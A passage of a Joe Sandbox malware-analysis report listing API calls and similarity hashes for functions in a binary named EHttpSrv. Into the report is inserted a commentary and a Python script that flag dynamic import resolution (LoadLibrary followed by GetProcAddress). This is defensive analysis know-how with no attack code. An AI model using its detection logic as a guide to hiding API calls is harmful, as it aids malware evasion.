                                                                                                                • Opcode Fuzzy Hash: e1965dff9c50a29cb80de7048452725fb93de9bb5d2244790109066319457e8f
                                                                                                                • Instruction Fuzzy Hash: 4D515FB13043069FD704DF68CC55E7FB7E9EBD8A08F008A2CB59597291EA78EC058B95
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 204307BC
                                                                                                                • #310.MFC80U ref: 204307CC
                                                                                                                • #1053.MFC80U(?,?,00000000,0000002C), ref: 204307DF
                                                                                                                • #310.MFC80U(?,?,00000000,0000002C), ref: 204307F0
                                                                                                                • #1053.MFC80U(?,?,00000000,0000003D), ref: 20430809
                                                                                                                • #774.MFC80U(?,?,?,00000000,0000003D), ref: 2043081B
                                                                                                                • #310.MFC80U(?,?,00000000,0000003D), ref: 20430828
                                                                                                                • #1053.MFC80U(?,?,00000001,0000003D), ref: 20430841
                                                                                                                • _wtol.MSVCR80 ref: 2043084F
                                                                                                                • #3869.MFC80U(00000000,?,00000000,?,000000FF,?,?,00000001,0000003D), ref: 20430896
                                                                                                                • #578.MFC80U(00000000,?,00000000,?,000000FF,?,?,00000001,0000003D), ref: 204308A7
                                                                                                                • #578.MFC80U ref: 204308B6
                                                                                                                • #1053.MFC80U(?,?,-00000001,0000002C), ref: 204308C8
                                                                                                                • #3395.MFC80U(?,?,00000000,0000002C), ref: 204308E8
                                                                                                                • #2788.MFC80U(?,?,00000000,0000002C), ref: 204308F6
                                                                                                                • SendMessageW.USER32(?,00001200), ref: 20430918
                                                                                                                • SendMessageW.USER32(?,0000120B,-00000001,?), ref: 2043092E
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 20430936
                                                                                                                • SendMessageW.USER32(?,0000120C,-00000001,?), ref: 2043094F
                                                                                                                • #578.MFC80U ref: 2043095D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1053$#310#578MessageSend$#2788#3395#3869#774ClientMetricsRectSystem_wtol
                                                                                                                • String ID:
                                                                                                                • API String ID: 4280695641-0
                                                                                                                • Opcode ID: 676eb742b4dfb1185c0e4fb7d7c19ae165f7a604b4f69baca16d50a8ddea98de
                                                                                                                • Instruction ID: d3306c2dc2b6d7d4adad176fa29cd68a2cf19bfba0a0eb39b50f631a340e2902
                                                                                                                • Opcode Fuzzy Hash: 676eb742b4dfb1185c0e4fb7d7c19ae165f7a604b4f69baca16d50a8ddea98de
                                                                                                                • Instruction Fuzzy Hash: A751A071508701ABE314DB65CC94F5BBBE4FB98B54F108B1CF595922E0DB78E904CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026wcscpy_s$memset$#310wcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2764536694-0
                                                                                                                • Opcode ID: ebad0841af5831171d73bf8388fe049bd1bd72ce455b8242ac7a8760335e44c4
                                                                                                                • Instruction ID: e37fd1f3625893c1c44e5bcf08bd10de1f0668e815bcb2f4157593aa8b119332
                                                                                                                • Opcode Fuzzy Hash: ebad0841af5831171d73bf8388fe049bd1bd72ce455b8242ac7a8760335e44c4
                                                                                                                • Instruction Fuzzy Hash: 3881A3B0504B02ABE311CF24CC85BA7B7B8FF48709F408D1DE9A657391D7B976489B51
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044D4D8
                                                                                                                • #776.MFC80U(20483CF0), ref: 2044D53D
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044D750
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044D791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#314#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 527024662-0
                                                                                                                • Opcode ID: 74c24d0cb461f308b201a75516ed458f182609a21cb2372e90b48c6f5989f4f3
                                                                                                                • Instruction ID: 8dd999ad99c8cdfa40ad9653db68ec9141ca0acd8cbb1f7ca18c7e41612e3f41
                                                                                                                • Opcode Fuzzy Hash: 74c24d0cb461f308b201a75516ed458f182609a21cb2372e90b48c6f5989f4f3
                                                                                                                • Instruction Fuzzy Hash: 5681F271A08A41AFE704DFA4CC44B9ABBE0FB85719F00C61DF59593290DB3CA905CB92
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 2043776B
                                                                                                                • GetSystemMetrics.USER32(00000003), ref: 20437773
                                                                                                                • GetClientRect.USER32(?,?), ref: 20437780
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2043778F
                                                                                                                • #5609.MFC80U(?), ref: 2043779C
                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 204377CA
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 204377DD
                                                                                                                • #6061.MFC80U(00000000,?,?,?,?,00000014), ref: 20437817
                                                                                                                • #6061.MFC80U(00000000,?,?,?,?,00000014,00000000,?,?,?,?,00000014), ref: 20437840
                                                                                                                • InvalidateRect.USER32(76945540,00000000,00000001,00000000,?,?,?,?,00000014,00000000,?,?,?,?,00000014), ref: 2043785E
                                                                                                                • #6086.MFC80U(00000000), ref: 20437875
                                                                                                                • #2155.MFC80U(00000000,00000000), ref: 2043787E
                                                                                                                • SendMessageW.USER32(?,00001207,00000000,?), ref: 2043789A
                                                                                                                • SendMessageW.USER32(?,00001207,-000000FF,?), ref: 204378B2
                                                                                                                • #3395.MFC80U ref: 204378EB
                                                                                                                • #6061.MFC80U(00000000,?,?,?,00000000,00000054), ref: 2043791F
                                                                                                                • #5981.MFC80U(00000002,00000007,00000001), ref: 20437966
                                                                                                                • #2155.MFC80U(00000001,00000002,00000007,00000001), ref: 2043796F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#6061MessageSend$#2155MetricsSystem$#3395#5609#5981#6086ClientInvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3645718903-0
                                                                                                                • Opcode ID: 21ccb586117c78da2a23b02a06aaa101c8c2654ad8c76e7f71005bc749b1e17f
                                                                                                                • Instruction ID: 6873d10806194d77a4cfca0b4f43bae2f31d94951606afd11c3252bb2f2f83c1
                                                                                                                • Opcode Fuzzy Hash: 21ccb586117c78da2a23b02a06aaa101c8c2654ad8c76e7f71005bc749b1e17f
                                                                                                                • Instruction Fuzzy Hash: CC613C71648700AFD304CB64CD85F6BB7E9ABC8B08F008A1DF69597290DAB4E905CB52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$wcscpy_swcsncpy_s$_snwprintf_s
                                                                                                                • String ID: IP6_ADDR
                                                                                                                • API String ID: 2905155339-1561260847
                                                                                                                • Opcode ID: 47e3fe825613e1b6450fc5c50a4a0ad2b13a8b7b0fc8793c4d52f362dca36199
                                                                                                                • Instruction ID: e2a72aac4db4876480e7d1603feb0957049e14262460354dd65782d59b7c11bc
                                                                                                                • Opcode Fuzzy Hash: 47e3fe825613e1b6450fc5c50a4a0ad2b13a8b7b0fc8793c4d52f362dca36199
                                                                                                                • Instruction Fuzzy Hash: 9A412D30404B22BBC310AB98CC89E1F76AAEFC131AF14CA3DF51263295DB6E651586D6
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 20445AB2
                                                                                                                • strcpy_s.MSVCR80 ref: 20445AD8
                                                                                                                • strcat_s.MSVCR80 ref: 20445AEF
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,-00000001,?,00000008), ref: 20445AFF
                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,-00000001,?,00000008), ref: 20445B18
                                                                                                                • strcpy_s.MSVCR80 ref: 20445B30
                                                                                                                • strcat_s.MSVCR80 ref: 20445B41
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 20445B4B
                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B5F
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 20445B66
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 20445B7C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressProc$FreeLoadstrcat_sstrcpy_s$DirectorySystem
                                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                • API String ID: 1002071407-3078833738
                                                                                                                • Opcode ID: 7049ffa7209eaf4601507fc619209b423472e0dc5b36286b745ed577acdaf74b
                                                                                                                • Instruction ID: 11f288673e82c687b43bf6052560b49ad4e3b1d551902d6b513d8f73b389c7dc
                                                                                                                • Opcode Fuzzy Hash: 7049ffa7209eaf4601507fc619209b423472e0dc5b36286b745ed577acdaf74b
                                                                                                                • Instruction Fuzzy Hash: 8A4191715097419BD310EFA5CCC4A9BBBE8EBC8744F40CD2DE54497251EB7CEA048B96
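The function summarized above is the only one in this section that resolves imports at run time: it builds a path from GetSystemDirectoryA, loads ws2_32 and then wship6 from that directory, asks each for getaddrinfo, and ends with a GetProcAddress whose target name is not a constant at the call site. That exact chain is consistent with the getaddrinfo compatibility shim that the Windows SDK's wspiapi.h inlines into any program built against it, so by itself it is weak evidence of deliberate API hiding, even though it is the pattern the "Contains functionality to dynamically determine API calls" signature keys on. The script below is an added example, not Joe Sandbox code and not part of the report: it parses these per-function "APIs" / "Similarity" blocks into records and flags LoadLibrary-then-GetProcAddress chains, so an analyst can pull the dynamically resolved names and the string constants they were loaded from out of a long report instead of reading every block by hand. The block layout is inferred from the text of this report, and the embedded SAMPLE is constructed from the two summaries on this page, trimmed to the lines the parser needs.

```python
"""Parse Joe Sandbox per-function summaries and flag dynamic API resolution.

Added example, not Joe Sandbox code; the block format is inferred from the
report text itself (an 'APIs' header, bullet lines of API calls, then a
'Similarity' section with 'String ID' / 'Opcode ID' fields).
"""
import re
from collections import Counter

# Constructed sample: the two summaries above, trimmed to the lines used here.
SAMPLE = r"""
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 20445AB2
• strcpy_s.MSVCR80 ref: 20445AD8
• strcat_s.MSVCR80 ref: 20445AEF
• LoadLibraryA.KERNEL32(?,?,?,?,-00000001,?,00000008), ref: 20445AFF
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D
• FreeLibrary.KERNEL32(00000000,?,?,?,-00000001,?,00000008), ref: 20445B18
• strcpy_s.MSVCR80 ref: 20445B30
• strcat_s.MSVCR80 ref: 20445B41
• LoadLibraryA.KERNEL32(?), ref: 20445B4B
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B5F
• FreeLibrary.KERNEL32(00000000), ref: 20445B66
• GetProcAddress.KERNEL32(00000000,?), ref: 20445B7C
Similarity
• API ID: Library$AddressProc$FreeLoadstrcat_sstrcpy_s$DirectorySystem
• String ID: \ws2_32$\wship6$getaddrinfo
• API String ID: 1002071407-3078833738
• Opcode ID: 7049ffa7209eaf4601507fc619209b423472e0dc5b36286b745ed577acdaf74b
APIs
• SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2045AEFE
• malloc.MSVCR80 ref: 2045AF09
• CertGetNameStringW.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 2045B14E
Similarity
• API ID: MessageSend$#5862freemalloc$CertNameString$#1176#3873
• String ID:
• API String ID: 2005483445-0
• Opcode ID: f6091f5a1c2f201371206002669792c78905fec26cb7a3506b44a1ce23e23444
"""

# "• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D"
# or the argument-less form "• strcpy_s.MSVCR80 ref: 20445AD8".
API_RE = re.compile(
    r"^•\s*(?P<name>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• String ID: \ws2_32$\wship6$getaddrinfo" and the other key/value bullets.
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

# Calls that hand back a module handle later fed to GetProcAddress.
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}


def parse_function_summaries(text):
    """Return one dict per 'APIs' block: its calls (in call order), the
    '$'-separated String ID constants, and the Similarity identifiers."""
    summaries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "strings": [], "api_id": "",
                       "api_string_id": "", "opcode_id": ""}
            summaries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            current["apis"].append({"name": m.group("name"),
                                    "module": m.group("module"),
                                    "args": args.split(",") if args else [],
                                    "ref": int(m.group("ref"), 16)})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "String ID":
            current["strings"] = [s for s in value.split("$") if s]
        elif key in ("API ID", "API String ID", "Opcode ID"):
            current[key.lower().replace(" ", "_")] = value
    return summaries


def resolved_imports(summary):
    """Names passed to GetProcAddress, in call order. A '?' means the name
    was not a constant at that call site (it comes from data at run time)."""
    return [c["args"][1] for c in summary["apis"]
            if c["name"] == "GetProcAddress" and len(c["args"]) >= 2]


def uses_dynamic_resolution(summary):
    """True when a module load precedes GetProcAddress in the same function."""
    loaded = False
    for call in summary["apis"]:
        if call["name"] in LOADERS:
            loaded = True
        elif call["name"] == "GetProcAddress" and loaded:
            return True
    return False


def call_counts(summary):
    return Counter(call["name"] for call in summary["apis"])


def triage(summary):
    """One-line verdict for an analyst's notes."""
    if not uses_dynamic_resolution(summary):
        return "static imports only"
    names = resolved_imports(summary)
    constant = sorted({n for n in names if n != "?"})
    hidden = names.count("?")
    return (f"dynamic resolution of {constant} from {summary['strings']}; "
            f"{hidden} call(s) with non-constant name")


if __name__ == "__main__":
    for s in parse_function_summaries(SAMPLE):
        print(s["opcode_id"][:16], triage(s))
```

Run against a full report, the script narrows review to the handful of functions whose GetProcAddress targets are not constants; a function that only resolves a known Winsock name from ws2_32 is far less interesting than one that loads a library and resolves names it never spells out.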
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2045AEFE
                                                                                                                • malloc.MSVCR80 ref: 2045AF09
                                                                                                                • #1176.MFC80U(?,?,?,00000000), ref: 2045AF89
                                                                                                                • free.MSVCR80 ref: 2045B00D
                                                                                                                • malloc.MSVCR80 ref: 2045B01D
                                                                                                                • #3873.MFC80U(00000001,000000FF,?,00000000,00000000,00000000,00000000), ref: 2045B090
                                                                                                                • #5862.MFC80U(000000FF,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000001,000000FF,?,00000000,00000000,00000000,00000000), ref: 2045B0AB
                                                                                                                • #5862.MFC80U(000000FF,00000000,00000004,00000000,00000000,00000000,00000000,?,000000FF,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 2045B0C3
                                                                                                                • CertGetNameStringW.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 2045B14E
                                                                                                                • free.MSVCR80 ref: 2045B184
                                                                                                                • malloc.MSVCR80 ref: 2045B191
                                                                                                                • CertGetNameStringW.CRYPT32(?,00000004,00000001,00000000,00000000,00000080), ref: 2045B1DA
                                                                                                                • #5862.MFC80U(000000FF,00000001,00000001,00000000,00000000,00000000,00000000,00000000), ref: 2045B1FE
                                                                                                                • free.MSVCR80 ref: 2045B25E
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 2045B280
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 2045B295
                                                                                                                • SendMessageW.USER32(?,0000101E,00000002,0000FFFE), ref: 2045B2AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#5862freemalloc$CertNameString$#1176#3873
                                                                                                                • String ID:
                                                                                                                • API String ID: 2005483445-0
                                                                                                                • Opcode ID: f6091f5a1c2f201371206002669792c78905fec26cb7a3506b44a1ce23e23444
                                                                                                                • Instruction ID: 7aa81ce3c81966263314b35946536dfc2b25f7b097feda67f60f561cf53201e5
                                                                                                                • Opcode Fuzzy Hash: f6091f5a1c2f201371206002669792c78905fec26cb7a3506b44a1ce23e23444
                                                                                                                • Instruction Fuzzy Hash: 18C161B1B40605ABDB10CF94CC85FED7BB5AF58708F148169FA04AF391C7B9A945CBA0
                                                                                                                APIs
                                                                                                                • #762.MFC80U(00000040,FEEA6C22,?,?,76945540,?,00000000,2047CE6B,000000FF,2041340D,00000000,?,00000000), ref: 20420E6E
                                                                                                                • #764.MFC80U(?), ref: 20420EBE
                                                                                                                • #764.MFC80U(?), ref: 20420ED7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 20420F4E
                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 20420F5B
                                                                                                                • UpdateWindow.USER32(?), ref: 20420F61
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,76945540,?,00000000,2047CE6B,000000FF,2041340D,00000000,?,00000000), ref: 20420F7C
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 20420FE7
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20421006
                                                                                                                • #2362.MFC80U(00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042100D
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 2042101F
                                                                                                                • SendMessageW.USER32(?,0000102C,?,00000002), ref: 2042103C
                                                                                                                • #5867.MFC80U(?,00000000,00000002,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042105C
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210A1
                                                                                                                • #5867.MFC80U(?,00000002,00000002,?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210D9
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210EE
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042111E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2361$MessageSend$#5867#764Object$#1176#2362#762CurrentUpdateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2351648720-0
                                                                                                                • Opcode ID: 672f647bf08ec23234bc2087f0e45b13ee6fb693e93c213341d5d513fe22b25d
                                                                                                                • Instruction ID: 9e60b9e9ee0762daa73f16079c96528702c899e64c1e2e01d0807964c78369a3
                                                                                                                • Opcode Fuzzy Hash: 672f647bf08ec23234bc2087f0e45b13ee6fb693e93c213341d5d513fe22b25d
                                                                                                                • Instruction Fuzzy Hash: ECB1A171604B809FD324CFA9D980B67BBE4BF58704F40891DE68A87B61D778F944CBA1
                                                                                                                APIs
                                                                                                                • #501.MFC80U(?,FEEA6C22), ref: 20434EF7
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 20434F0E
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 20434F17
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 20434F29
                                                                                                                • #1270.MFC80U(00000000), ref: 20434F34
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 20434F45
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20434F86
                                                                                                                • #1271.MFC80U(00000000), ref: 20434F91
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 20434FA0
                                                                                                                • GetMapMode.GDI32(?,?,?,00000000), ref: 20434FAC
                                                                                                                • #5884.MFC80U(00000000), ref: 20434FB7
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 20434FC8
                                                                                                                • #6058.MFC80U(?,?,?), ref: 20434FE1
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 20435023
                                                                                                                • #5633.MFC80U(?,00000000), ref: 20435036
                                                                                                                • #602.MFC80U(?,00000000), ref: 20435068
                                                                                                                • #709.MFC80U(?,00000000), ref: 2043507C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5633CompatibleCreate$#1270#1271#2521#347#501#5884#602#6058#709BitmapMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 1373658176-0
                                                                                                                • Opcode ID: c34cfe65f2e81302b6606f60459f7e002a2ad8293115252f17f7a2094577e07d
                                                                                                                • Instruction ID: a83816640fc43899ab8bedff050c7f80ea9979f3e0078e773df583a019831a82
                                                                                                                • Opcode Fuzzy Hash: c34cfe65f2e81302b6606f60459f7e002a2ad8293115252f17f7a2094577e07d
                                                                                                                • Instruction Fuzzy Hash: 63510A71108380AFC314CBA4C895FABBBF9FBD9614F408A1DF59597290DB35A904CBA2
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20454F37
                                                                                                                • #2651.MFC80U(000004DD), ref: 20454FB1
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20454FC9
                                                                                                                • #2651.MFC80U(00000418), ref: 20454FD2
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 20454FE4
